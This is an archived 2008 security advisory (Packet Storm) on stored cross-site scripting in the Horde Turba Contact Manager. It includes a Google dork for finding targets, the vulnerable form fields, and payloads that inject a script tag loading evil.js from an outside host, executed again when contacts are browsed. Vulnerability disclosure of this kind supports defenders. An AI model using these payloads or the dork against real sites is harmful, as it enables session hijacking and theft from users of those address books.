hordeturba-xss.txt

2008-05-15T00:00:00
ID PACKETSTORM:66393
Type packetstorm
Reporter Ivan Sanchez
Modified 2008-05-15T00:00:00

Description

                                        
                                            `+==========================================================================+  
+ Horde & Turba Contact Manager & XSS Vulnerabilities +  
+==========================================================================+  
  
  
Author(s): Ivan Sanchez   
  
Product: Turba Contact Manager  
  
Web: http://www.horde.org  
  
Versions: Horde & Turba Contact Manager   
  
Date: 13/05/2008  
  
  
Turba is the Horde contact management application. It is a production level  
address book, and makes heavy use of the Horde framework to provide integration   
with IMP and other Horde applications.  
  
  
  
GOOGLE DORKS:  
------------  
  
inurl:"addobject.php?"  
  
  
Evil Function:   
--------------  
  
http://www.site/horde2/turba/addobject.php?  
  
Advanced Search / then inside the form, put evil code:(name/e-mail)form-  
  
  
Internal Variables:  
-------------------  
  
object%5Bemail5D  
object%5Btitle5D  
  
  
First EXPLOIT:  
--------------  
  
Insert evil code into these variables,then run the exploit !!!  
  
1-object%5Bemail5D= "><script src=http://site/scripts/evil.js></script>  
2-object%5Btitle5D= "><script src=http://site/scripts/evil.js></script>  
  
  
  
Second EXPLOIT:  
--------------  
  
then if you see your contacts adresses, you will see a lot of insane code XSS there.  
If you click on them,exploit again !!!!  
  
  
http://www.site/horde2/turba/browse.php  
  
Exploit again the evil script!!!!  
  
  
  
NULL CODE SERVICES [ www.nullcode.com.ar ] Hunting Security Bugs!  
+==========================================================================+  
+ Horde & Turba Contact Manager & XSS Vulnerabilities +  
+==========================================================================+`